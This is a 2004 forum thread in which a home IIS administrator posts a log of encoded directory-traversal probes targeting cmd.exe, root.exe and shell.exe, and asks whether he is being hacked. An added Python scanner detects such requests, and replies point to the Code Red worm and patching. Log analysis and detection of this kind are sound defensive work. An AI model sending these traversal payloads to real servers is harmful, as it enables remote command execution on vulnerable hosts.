Networking Forums

OT: Have I got a hacker?

Ray
08-29-2004, 01:49 AM

Hello All, I recently set up a webserver using IIS in Windows XP. I
noticed the following data in the log tonight, and wonder if anyone could
possibly tell me what it means. Everything else in the log appears to be
just general page access, but this looks a bit dodgy to me, as I don't
recognise what it means. Is someone trying to hack into my server? I have
replaced the originating IP address in this log with xxx.xx.xxx.xx.

16:59:20 xxx.xx.xxx.xx GET /..%5c..%5cwinnt/system32/cmd.exe 404
16:59:24 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
16:59:24 xxx.xx.xxx.xx GET /_vti_bin/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe 404
16:59:26 xxx.xx.xxx.xx GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
16:59:26 xxx.xx.xxx.xx GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
16:59:28 xxx.xx.xxx.xx GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
16:59:28 xxx.xx.xxx.xx GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
16:59:30 xxx.xx.xxx.xx GET /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe 404
16:59:30 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
16:59:32 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
16:59:32 xxx.xx.xxx.xx GET /_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
16:59:33 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
16:59:37 xxx.xx.xxx.xx GET /adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
16:59:37 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
16:59:39 xxx.xx.xxx.xx GET /cgi-bin/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
16:59:40 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
16:59:40 xxx.xx.xxx.xx GET /iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
16:59:41 xxx.xx.xxx.xx GET /iisadmpwd/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
16:59:42 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
16:59:42 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
16:59:44 xxx.xx.xxx.xx GET /msadc/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe 404
16:59:44 xxx.xx.xxx.xx GET /MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
16:59:46 xxx.xx.xxx.xx GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
16:59:46 xxx.xx.xxx.xx GET /MSADC/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
16:59:48 xxx.xx.xxx.xx GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
16:59:48 xxx.xx.xxx.xx GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
16:59:50 xxx.xx.xxx.xx GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
16:59:50 xxx.xx.xxx.xx GET /msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
16:59:51 xxx.xx.xxx.xx GET /msadc/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 404
16:59:51 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
16:59:53 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
16:59:53 xxx.xx.xxx.xx GET /à/?/à/?/à/?/¯../winnt/system32/cmd.exe/ 404
16:59:55 xxx.xx.xxx.xx GET /msdac/root.exe 404
16:59:55 xxx.xx.xxx.xx GET /msdac/shell.exe 404
16:59:57 xxx.xx.xxx.xx GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
16:59:57 xxx.xx.xxx.xx GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
16:59:59 xxx.xx.xxx.xx GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
16:59:59 xxx.xx.xxx.xx GET /PBServer/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
17:00:01 xxx.xx.xxx.xx GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
17:00:01 xxx.xx.xxx.xx GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
17:00:03 xxx.xx.xxx.xx GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
17:00:03 xxx.xx.xxx.xx GET /Rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe 404
17:00:04 xxx.xx.xxx.xx GET /samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/system32/cmd.exe 404
17:00:04 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
17:00:06 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
17:00:06 xxx.xx.xxx.xx GET /scripts/.%2e/.%2e/winnt/system32/cmd.exe 404
17:00:08 xxx.xx.xxx.xx GET /scripts/..%2f..%2f..%2f..%2fwinnt/system32/cmd.exe 404
17:00:08 xxx.xx.xxx.xx GET /scripts/..%5c..%5cwinnt/system32/cmd.exe 404
17:00:13 xxx.xx.xxx.xx GET /scripts/..À%9v../winnt/system32/cmd.exe 404
17:00:13 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
17:00:14 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
17:00:14 xxx.xx.xxx.xx GET /scripts/..À%qf../winnt/system32/cmd.exe 404
17:00:16 xxx.xx.xxx.xx GET /scripts/..Á..Á..Á..Áwinnt/system32/cmd.exe 404
17:00:16 xxx.xx.xxx.xx GET /scripts/..Á../winnt/system32/cmd.exe 404
17:00:18 xxx.xx.xxx.xx GET /scripts/..Á%8s../winnt/system32/cmd.exe 404
17:00:18 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
17:00:20 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
17:00:20 xxx.xx.xxx.xx GET /scripts/..o../winnt/system32/cmd.exe 404
17:00:22 xxx.xx.xxx.xx GET /scripts/..Á%pc../winnt/system32/cmd.exe 404
17:00:22 xxx.xx.xxx.xx GET /winnt/system32/cmd.exe 404
17:00:23 xxx.xx.xxx.xx GET /scripts/..ð??¯../winnt/system32/cmd.exe 404
17:00:23 xxx.xx.xxx.xx GET /scripts/..ø???¯../winnt/system32/cmd.exe 404
17:00:25 xxx.xx.xxx.xx GET /scripts/..ü????¯../winnt/system32/cmd.exe 404
17:00:25 xxx.xx.xxx.xx GET /scripts/root.exe 404
17:00:27 xxx.xx.xxx.xx GET /scripts/shell.exe 404

Thanks Ray (worried) : - (
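A small heuristic scanner for log lines of the shape shown above, added here as an example rather than code from the thread: it percent-decodes each request path (twice, to catch double encoding), maps backslashes to slashes, flags lead bytes that can only be overlong or invalid UTF-8, and reports any surviving '..' segment or request ending in cmd.exe, root.exe or shell.exe. The sample log lines and client addresses inside it are constructed.

```python
from urllib.parse import unquote_to_bytes

# Constructed sample lines in the shape of the log above: time client method path status.
SAMPLE_LOG = """\
16:59:20 203.0.113.5 GET /..%5c..%5cwinnt/system32/cmd.exe 404
16:59:24 203.0.113.5 GET /_vti_bin/.%2e/.%2e/.%2e/.%2e/winnt/system32/cmd.exe 404
17:00:13 203.0.113.5 GET /scripts/..%c0%af../winnt/system32/cmd.exe 404
17:00:25 203.0.113.5 GET /scripts/root.exe 404
17:01:02 198.51.100.7 GET /index.html 200
17:01:05 198.51.100.7 GET /images/logo.png 200
"""
SHELL_TARGETS = ("cmd.exe", "root.exe", "shell.exe")

def has_overlong_utf8(data: bytes) -> bool:
    """True if a lead byte can only be overlong or invalid UTF-8 (0xC0, 0xC1, 0xF5-0xFF),
    which is the trick behind requests such as '..%c0%af..'."""
    return any(b in (0xC0, 0xC1) or b >= 0xF5 for b in data)

def normalise_path(raw: str) -> str:
    """Percent-decode twice (catches %255c double encoding), map backslashes to
    slashes, and decode leniently so bad UTF-8 becomes U+FFFD instead of raising."""
    data = unquote_to_bytes(unquote_to_bytes(raw))
    return data.replace(b"\\", b"/").decode("utf-8", errors="replace")

def analyse_line(line: str):
    """Return a dict of findings for one log line, or None if it looks benign."""
    parts = line.split()
    if len(parts) != 5:
        return None
    time, client, method, raw_path, status = parts
    decoded = normalise_path(raw_path)
    reasons = []
    if any(".." in seg for seg in decoded.split("/")):  # a '..' segment survived decoding
        reasons.append("traversal")
    if has_overlong_utf8(unquote_to_bytes(raw_path)):
        reasons.append("overlong-utf8")
    if decoded.lower().rstrip("/").endswith(SHELL_TARGETS):
        reasons.append("shell-target")
    return {"time": time, "client": client, "method": method, "status": status,
            "path": raw_path, "decoded": decoded, "reasons": reasons} if reasons else None

def scan(log_text: str) -> list:
    """Run analyse_line over every line and keep only the hits."""
    return [hit for hit in map(analyse_line, log_text.splitlines()) if hit]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit["time"], hit["client"], ",".join(hit["reasons"]), hit["decoded"])
```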

Derek
08-29-2004, 09:18 AM

On Sun, 29 Aug 2004 02:49:57 +0100, "Ray" <(E-Mail Removed)>
wrote:

>Hello All, I recently set up a webserver using IIS in Windows Xp.


....

>16:59:20 xxx.xx.xxx.xx GET /..%5c..%5cwinnt/system32/cmd.exe 404


Look up the Code Red worm.

I believe that the version of IIS that ships with Windows XP is not
vulnerable to this worm; however, since this is Usenet, that advice is
worth *exactly* what you paid for it and you should read up on methods
of securing IIS, and make sure that you are up to date on the various
hotfixes for both XP and IIS.

Derek
--
Q: How many surrealists does it take to screw in a lightbulb?
A: Two. One to hold the giraffe and the other to fill the bathtub
with brightly-colored machine tools.
 
THe NuTTeR
08-29-2004, 10:13 AM

That's a method of running processes on a remote host using IIS5 (I think
5, the one that comes with Win2K); we used to try it at school.
It's a bug in IIS that is exploited.
G
